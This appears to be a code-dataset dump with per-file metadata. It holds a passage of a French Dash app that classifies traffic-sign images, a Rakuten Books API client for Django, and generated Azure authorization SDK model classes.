image = np.array(image)
images_list.append(image)
return model.predict_classes(np.array(images_list))
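# Minimal usage sketch (the path is hypothetical, not part of the original
# app). Note that predict_classes only exists on Sequential models in
# TensorFlow < 2.6; on newer versions the equivalent is
# np.argmax(model.predict(x), axis=-1).
def _demo_classify(path='example.ppm'):
    image = Image.open(path)
    return classify_image(image, classifier)[0]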
app = dash.Dash('Traffic Signs Recognition', external_stylesheets=[dbc.themes.BOOTSTRAP])
pre_style = {
    'whiteSpace': 'normal',  # the original dict repeated this key; the last value wins
    'wordBreak': 'break-all',
}
# Define application layout
navbar = dbc.NavbarSimple(
children=[
dbc.DropdownMenu(
children=[
dbc.DropdownMenuItem('Réseau de Neurones', header=True),
dbc.DropdownMenuItem('SVM', href="#"),
],
nav=True,
in_navbar=True,
label='Modèle',
),
],
brand="Menu",
brand_href="#",
color= "#d90054",
dark=True
)
cards = html.Div(
[
dbc.Card(
dbc.CardBody(
[
html.H5("Présentation", className="card-title"),
html.P(
[
'Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\'une image. L\'application fonctionne de la manière suivante : vous déposer une image à l\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. En haut à droite vous pouvez sélectionner le modèle que vous voulez tester.',
],
className='card-text',
),
]
),
className='w-75 mb-3',
color='#f1cbd1',
outline='Black',
style={
'margin-top': '75px',
'margin-left': '185px'},
),
]
)
app.layout = html.Div([
html.Div([navbar]),
html.Div(cards),
dcc.Upload(
id='bouton-chargement',
children=html.Div([
'Cliquer-déposer ou ',
html.A('sélectionner une image')
]),
style={
'width': '50%',
'height': '60px',
'lineHeight': '60px',
'borderWidth': '1px',
'borderStyle': 'dashed',
'borderRadius': '5px',
'textAlign': 'center',
'margin-top': '75px',
'margin-left': '370px',
}
),
html.Div(id='mon-image'),
html.Div(id='ma-zone-resultat')
])
@app.callback(Output('mon-image', 'children'),
[Input('bouton-chargement', 'contents')])
def update_output(contents):
if contents is not None:
content_type, content_string = contents.split(',')
if 'image' in content_type:
image = Image.open(io.BytesIO(base64.b64decode(content_string)))
predicted_class = classify_image(image, classifier)[0]
return html.Div([
html.Hr(style={'margin-top': '75px'}),
html.Img(src=contents, style={'margin-left': '750px'}),
html.H4('Classe prédite : {}'.format(CLASSES[predicted_class]), style={'textAlign': 'center'}),
html.Hr(),
#html.Div('Raw Content'),
#html.Pre(contents, style=pre_style)
])
else:
try:
                # Decode the image sent in base 64 (ppm-file case)
                # base-64 file --> PIL image
image = Image.open(io.BytesIO(base64.b64decode(content_string)))
                # PIL image --> PNG conversion --> in-memory buffer
buffer = io.BytesIO()
image.save(buffer, format='PNG')
                # in-memory buffer --> base-64 image
buffer.seek(0)
img_bytes = buffer.read()
content_string = base64.b64encode(img_bytes).decode('ascii')
                # Call the classification model
predicted_class = classify_image(image, classifier)[0]
                # Display the image
return html.Div([
html.Hr(style={'margin-top': '75px'}),
html.Img(src='data:image/png;base64,' + content_string, style={'margin-left': '750px'}),
html.H4('Classe prédite : {}'.format(CLASSES[predicted_class]), style={'textAlign': 'center'}),
html.Hr(),
])
            except Exception:
return html.Div([
html.Hr(),
html.Div('Uniquement des images svp : {}'.format(content_type)),
html.Hr(),
html.Div('Raw Content'),
html.Pre(contents, style=pre_style)
])
# Manage interactions with callbacks
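# NOTE: the callback below listens to 'mon-champ-texte', which is never created
# in app.layout above; as written, Dash will reject it at callback-validation
# time unless the app is configured with suppress_callback_exceptions=True.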
@app.callback(
Output(component_id='ma-zone-resultat', component_property='children'),
[Input(component_id='mon-champ-texte', component_property='value')]
)
def update_output_div(input_value):
return html.H3('Valeur saisie ici "{}"'.format(input_value))
# Start the application
if __name__ == '__main__':
app.run_server(debug=True)
| 31.920213
| 402
| 0.551408
| 635
| 6,001
| 5.107087
| 0.398425
| 0.02806
| 0.016035
| 0.016651
| 0.19334
| 0.173296
| 0.173296
| 0.146778
| 0.146778
| 0.115325
| 0
| 0.017514
| 0.324446
| 6,001
| 188
| 403
| 31.920213
| 0.782437
| 0.097484
| 0
| 0.23741
| 0
| 0.007194
| 0.179301
| 0.004088
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021583
| false
| 0
| 0.086331
| 0.007194
| 0.143885
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86a57ddfcf5854e170f6cff9e4deb86cb8f9d464
| 1,214
|
py
|
Python
|
books/rakutenapi.py
|
NobukoYano/LibraryApp
|
623f60614f15ab760e1c0d2f18954ce948f2d2a3
|
[
"MIT"
] | 1
|
2019-04-27T11:18:42.000Z
|
2019-04-27T11:18:42.000Z
|
books/rakutenapi.py
|
NobukoYano/LibrayApp
|
623f60614f15ab760e1c0d2f18954ce948f2d2a3
|
[
"MIT"
] | 11
|
2020-02-12T00:11:23.000Z
|
2022-02-10T07:59:24.000Z
|
books/rakutenapi.py
|
NobukoYano/LibrayApp
|
623f60614f15ab760e1c0d2f18954ce948f2d2a3
|
[
"MIT"
] | null | null | null |
import json
import requests
from django.conf import settings
class rakuten:
def get_json(self, isbn: str) -> dict:
appid = settings.RAKUTEN_APP_ID
# API request template
api = "https://app.rakuten.co.jp/services/api/BooksTotal/"\
"Search/20170404?format=json&isbnjan={isbnjan}&"\
"applicationId={appid}"
# format get api URL
url = api.format(isbnjan=isbn, appid=appid)
# execute
r = requests.get(url)
        # check the HTTP status code
status_code = r.status_code
if status_code != 200:
# if failed
return None
        # decode the response body from json
        data = json.loads(r.text)
if data['count'] == 0:
return None
json_data = {}
json_data['isbn'] = data['Items'][0]['Item']['isbn']
json_data['title'] = data['Items'][0]['Item']['title']
json_data['publisher'] = data['Items'][0]['Item']['publisherName']
json_data['pubdate'] = data['Items'][0]['Item']['salesDate']
json_data['cover'] = data['Items'][0]['Item']['largeImageUrl']
json_data['author'] = data['Items'][0]['Item']['author']
return json_data
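# Minimal usage sketch (the ISBN and app id are placeholders; the real class
# above also requires RAKUTEN_APP_ID in Django settings). The URL-building
# step can be exercised standalone:
def _demo_rakuten_url(isbn: str, appid: str) -> str:
    api = "https://app.rakuten.co.jp/services/api/BooksTotal/"\
          "Search/20170404?format=json&isbnjan={isbnjan}&"\
          "applicationId={appid}"
    return api.format(isbnjan=isbn, appid=appid)
# e.g. _demo_rakuten_url("9784873117386", "my-app-id")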
| 27.590909
| 74
| 0.559308
| 143
| 1,214
| 4.65035
| 0.41958
| 0.096241
| 0.090226
| 0.126316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020666
| 0.282537
| 1,214
| 43
| 75
| 28.232558
| 0.742824
| 0.07743
| 0
| 0.08
| 0
| 0
| 0.2354
| 0.060198
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.12
| 0
| 0.32
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86a699aa985f4eb39369d4b317e19a2eb2706a0b
| 18,710
|
py
|
Python
|
sdk/authorization/azure-mgmt-authorization/azure/mgmt/authorization/v2018_01_01_preview/models/_models_py3.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/authorization/azure-mgmt-authorization/azure/mgmt/authorization/v2018_01_01_preview/models/_models_py3.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 17,773
|
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/authorization/azure-mgmt-authorization/azure/mgmt/authorization/v2018_01_01_preview/models/_models_py3.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, List, Optional
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class ErrorAdditionalInfo(msrest.serialization.Model):
"""The resource management error additional info.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar type: The additional info type.
:vartype type: str
:ivar info: The additional info.
:vartype info: any
"""
_validation = {
'type': {'readonly': True},
'info': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'info': {'key': 'info', 'type': 'object'},
}
def __init__(
self,
**kwargs
):
super(ErrorAdditionalInfo, self).__init__(**kwargs)
self.type = None
self.info = None
class ErrorDetail(msrest.serialization.Model):
"""The error detail.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar code: The error code.
:vartype code: str
:ivar message: The error message.
:vartype message: str
:ivar target: The error target.
:vartype target: str
:ivar details: The error details.
:vartype details: list[~azure.mgmt.authorization.v2018_01_01_preview.models.ErrorDetail]
:ivar additional_info: The error additional info.
:vartype additional_info:
list[~azure.mgmt.authorization.v2018_01_01_preview.models.ErrorAdditionalInfo]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'target': {'readonly': True},
'details': {'readonly': True},
'additional_info': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
'details': {'key': 'details', 'type': '[ErrorDetail]'},
'additional_info': {'key': 'additionalInfo', 'type': '[ErrorAdditionalInfo]'},
}
def __init__(
self,
**kwargs
):
super(ErrorDetail, self).__init__(**kwargs)
self.code = None
self.message = None
self.target = None
self.details = None
self.additional_info = None
class ErrorResponse(msrest.serialization.Model):
"""Common error response for all Azure Resource Manager APIs to return error details for failed operations. (This also follows the OData error response format.).
:param error: The error object.
:type error: ~azure.mgmt.authorization.v2018_01_01_preview.models.ErrorDetail
"""
_attribute_map = {
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
*,
error: Optional["ErrorDetail"] = None,
**kwargs
):
super(ErrorResponse, self).__init__(**kwargs)
self.error = error
class Permission(msrest.serialization.Model):
"""Role definition permissions.
:param actions: Allowed actions.
:type actions: list[str]
:param not_actions: Denied actions.
:type not_actions: list[str]
:param data_actions: Allowed Data actions.
:type data_actions: list[str]
:param not_data_actions: Denied Data actions.
:type not_data_actions: list[str]
"""
_attribute_map = {
'actions': {'key': 'actions', 'type': '[str]'},
'not_actions': {'key': 'notActions', 'type': '[str]'},
'data_actions': {'key': 'dataActions', 'type': '[str]'},
'not_data_actions': {'key': 'notDataActions', 'type': '[str]'},
}
def __init__(
self,
*,
actions: Optional[List[str]] = None,
not_actions: Optional[List[str]] = None,
data_actions: Optional[List[str]] = None,
not_data_actions: Optional[List[str]] = None,
**kwargs
):
super(Permission, self).__init__(**kwargs)
self.actions = actions
self.not_actions = not_actions
self.data_actions = data_actions
self.not_data_actions = not_data_actions
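# Illustrative sketch (not from the generated source): constructing a
# read-only Permission; the action strings are placeholders, and all
# parameters are keyword-only per the signature above.
def _demo_reader_permission():
    return Permission(
        actions=["*/read"],   # allow all control-plane read operations
        not_actions=[],       # no control-plane exclusions
        data_actions=[],      # no data-plane actions granted
        not_data_actions=[],
    )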
class PermissionGetResult(msrest.serialization.Model):
"""Permissions information.
:param value: An array of permissions.
:type value: list[~azure.mgmt.authorization.v2018_01_01_preview.models.Permission]
:param next_link: The URL to use for getting the next set of results.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[Permission]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["Permission"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(PermissionGetResult, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class ProviderOperation(msrest.serialization.Model):
"""Operation.
:param name: The operation name.
:type name: str
:param display_name: The operation display name.
:type display_name: str
:param description: The operation description.
:type description: str
:param origin: The operation origin.
:type origin: str
:param properties: The operation properties.
:type properties: any
:param is_data_action: The dataAction flag to specify the operation type.
:type is_data_action: bool
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'origin': {'key': 'origin', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'object'},
'is_data_action': {'key': 'isDataAction', 'type': 'bool'},
}
def __init__(
self,
*,
name: Optional[str] = None,
display_name: Optional[str] = None,
description: Optional[str] = None,
origin: Optional[str] = None,
properties: Optional[Any] = None,
is_data_action: Optional[bool] = None,
**kwargs
):
super(ProviderOperation, self).__init__(**kwargs)
self.name = name
self.display_name = display_name
self.description = description
self.origin = origin
self.properties = properties
self.is_data_action = is_data_action
class ProviderOperationsMetadata(msrest.serialization.Model):
"""Provider Operations metadata.
:param id: The provider id.
:type id: str
:param name: The provider name.
:type name: str
:param type: The provider type.
:type type: str
:param display_name: The provider display name.
:type display_name: str
:param resource_types: The provider resource types.
:type resource_types: list[~azure.mgmt.authorization.v2018_01_01_preview.models.ResourceType]
:param operations: The provider operations.
:type operations: list[~azure.mgmt.authorization.v2018_01_01_preview.models.ProviderOperation]
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'resource_types': {'key': 'resourceTypes', 'type': '[ResourceType]'},
'operations': {'key': 'operations', 'type': '[ProviderOperation]'},
}
def __init__(
self,
*,
id: Optional[str] = None,
name: Optional[str] = None,
type: Optional[str] = None,
display_name: Optional[str] = None,
resource_types: Optional[List["ResourceType"]] = None,
operations: Optional[List["ProviderOperation"]] = None,
**kwargs
):
super(ProviderOperationsMetadata, self).__init__(**kwargs)
self.id = id
self.name = name
self.type = type
self.display_name = display_name
self.resource_types = resource_types
self.operations = operations
class ProviderOperationsMetadataListResult(msrest.serialization.Model):
"""Provider operations metadata list.
:param value: The list of providers.
:type value:
list[~azure.mgmt.authorization.v2018_01_01_preview.models.ProviderOperationsMetadata]
:param next_link: The URL to use for getting the next set of results.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[ProviderOperationsMetadata]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["ProviderOperationsMetadata"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(ProviderOperationsMetadataListResult, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class ResourceType(msrest.serialization.Model):
"""Resource Type.
:param name: The resource type name.
:type name: str
:param display_name: The resource type display name.
:type display_name: str
:param operations: The resource type operations.
:type operations: list[~azure.mgmt.authorization.v2018_01_01_preview.models.ProviderOperation]
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'operations': {'key': 'operations', 'type': '[ProviderOperation]'},
}
def __init__(
self,
*,
name: Optional[str] = None,
display_name: Optional[str] = None,
operations: Optional[List["ProviderOperation"]] = None,
**kwargs
):
super(ResourceType, self).__init__(**kwargs)
self.name = name
self.display_name = display_name
self.operations = operations
class RoleAssignment(msrest.serialization.Model):
"""Role Assignments.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The role assignment ID.
:vartype id: str
:ivar name: The role assignment name.
:vartype name: str
:ivar type: The role assignment type.
:vartype type: str
:param scope: The role assignment scope.
:type scope: str
:param role_definition_id: The role definition ID.
:type role_definition_id: str
:param principal_id: The principal ID.
:type principal_id: str
:param can_delegate: The Delegation flag for the role assignment.
:type can_delegate: bool
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'scope': {'key': 'properties.scope', 'type': 'str'},
'role_definition_id': {'key': 'properties.roleDefinitionId', 'type': 'str'},
'principal_id': {'key': 'properties.principalId', 'type': 'str'},
'can_delegate': {'key': 'properties.canDelegate', 'type': 'bool'},
}
def __init__(
self,
*,
scope: Optional[str] = None,
role_definition_id: Optional[str] = None,
principal_id: Optional[str] = None,
can_delegate: Optional[bool] = None,
**kwargs
):
super(RoleAssignment, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.scope = scope
self.role_definition_id = role_definition_id
self.principal_id = principal_id
self.can_delegate = can_delegate
class RoleAssignmentCreateParameters(msrest.serialization.Model):
"""Role assignment create parameters.
All required parameters must be populated in order to send to Azure.
:param role_definition_id: Required. The role definition ID used in the role assignment.
:type role_definition_id: str
:param principal_id: Required. The principal ID assigned to the role. This maps to the ID
inside the Active Directory. It can point to a user, service principal, or security group.
:type principal_id: str
:param can_delegate: The delegation flag used for creating a role assignment.
:type can_delegate: bool
"""
_validation = {
'role_definition_id': {'required': True},
'principal_id': {'required': True},
}
_attribute_map = {
'role_definition_id': {'key': 'properties.roleDefinitionId', 'type': 'str'},
'principal_id': {'key': 'properties.principalId', 'type': 'str'},
'can_delegate': {'key': 'properties.canDelegate', 'type': 'bool'},
}
def __init__(
self,
*,
role_definition_id: str,
principal_id: str,
can_delegate: Optional[bool] = None,
**kwargs
):
super(RoleAssignmentCreateParameters, self).__init__(**kwargs)
self.role_definition_id = role_definition_id
self.principal_id = principal_id
self.can_delegate = can_delegate
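# Illustrative sketch: role_definition_id and principal_id are both marked
# required in _validation above, so they must be supplied. The identifiers
# below are placeholders, not real Azure resource IDs.
def _demo_assignment_parameters():
    return RoleAssignmentCreateParameters(
        role_definition_id="/subscriptions/<sub-id>/providers/"
                           "Microsoft.Authorization/roleDefinitions/<role-guid>",
        principal_id="<principal-object-id>",
    )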
class RoleAssignmentFilter(msrest.serialization.Model):
"""Role Assignments filter.
:param principal_id: Returns role assignment of the specific principal.
:type principal_id: str
:param can_delegate: The Delegation flag for the role assignment.
:type can_delegate: bool
"""
_attribute_map = {
'principal_id': {'key': 'principalId', 'type': 'str'},
'can_delegate': {'key': 'canDelegate', 'type': 'bool'},
}
def __init__(
self,
*,
principal_id: Optional[str] = None,
can_delegate: Optional[bool] = None,
**kwargs
):
super(RoleAssignmentFilter, self).__init__(**kwargs)
self.principal_id = principal_id
self.can_delegate = can_delegate
class RoleAssignmentListResult(msrest.serialization.Model):
"""Role assignment list operation result.
:param value: Role assignment list.
:type value: list[~azure.mgmt.authorization.v2018_01_01_preview.models.RoleAssignment]
:param next_link: The URL to use for getting the next set of results.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[RoleAssignment]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["RoleAssignment"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(RoleAssignmentListResult, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class RoleDefinition(msrest.serialization.Model):
"""Role definition.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The role definition ID.
:vartype id: str
:ivar name: The role definition name.
:vartype name: str
:ivar type: The role definition type.
:vartype type: str
:param role_name: The role name.
:type role_name: str
:param description: The role definition description.
:type description: str
:param role_type: The role type.
:type role_type: str
:param permissions: Role definition permissions.
:type permissions: list[~azure.mgmt.authorization.v2018_01_01_preview.models.Permission]
:param assignable_scopes: Role definition assignable scopes.
:type assignable_scopes: list[str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'role_name': {'key': 'properties.roleName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'role_type': {'key': 'properties.type', 'type': 'str'},
'permissions': {'key': 'properties.permissions', 'type': '[Permission]'},
'assignable_scopes': {'key': 'properties.assignableScopes', 'type': '[str]'},
}
def __init__(
self,
*,
role_name: Optional[str] = None,
description: Optional[str] = None,
role_type: Optional[str] = None,
permissions: Optional[List["Permission"]] = None,
assignable_scopes: Optional[List[str]] = None,
**kwargs
):
super(RoleDefinition, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.role_name = role_name
self.description = description
self.role_type = role_type
self.permissions = permissions
self.assignable_scopes = assignable_scopes
class RoleDefinitionFilter(msrest.serialization.Model):
"""Role Definitions filter.
:param role_name: Returns role definition with the specific name.
:type role_name: str
:param type: Returns role definition with the specific type.
:type type: str
"""
_attribute_map = {
'role_name': {'key': 'roleName', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
*,
role_name: Optional[str] = None,
type: Optional[str] = None,
**kwargs
):
super(RoleDefinitionFilter, self).__init__(**kwargs)
self.role_name = role_name
self.type = type
class RoleDefinitionListResult(msrest.serialization.Model):
"""Role definition list operation result.
:param value: Role definition list.
:type value: list[~azure.mgmt.authorization.v2018_01_01_preview.models.RoleDefinition]
:param next_link: The URL to use for getting the next set of results.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[RoleDefinition]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["RoleDefinition"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(RoleDefinitionListResult, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
| 32.147766
| 165
| 0.615446
| 2,014
| 18,710
| 5.531778
| 0.103774
| 0.028902
| 0.030967
| 0.02585
| 0.533794
| 0.458846
| 0.40903
| 0.390988
| 0.319181
| 0.300332
| 0
| 0.006306
| 0.245697
| 18,710
| 581
| 166
| 32.203098
| 0.783108
| 0.334848
| 0
| 0.591463
| 0
| 0
| 0.182952
| 0.024427
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04878
| false
| 0
| 0.009146
| 0
| 0.170732
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|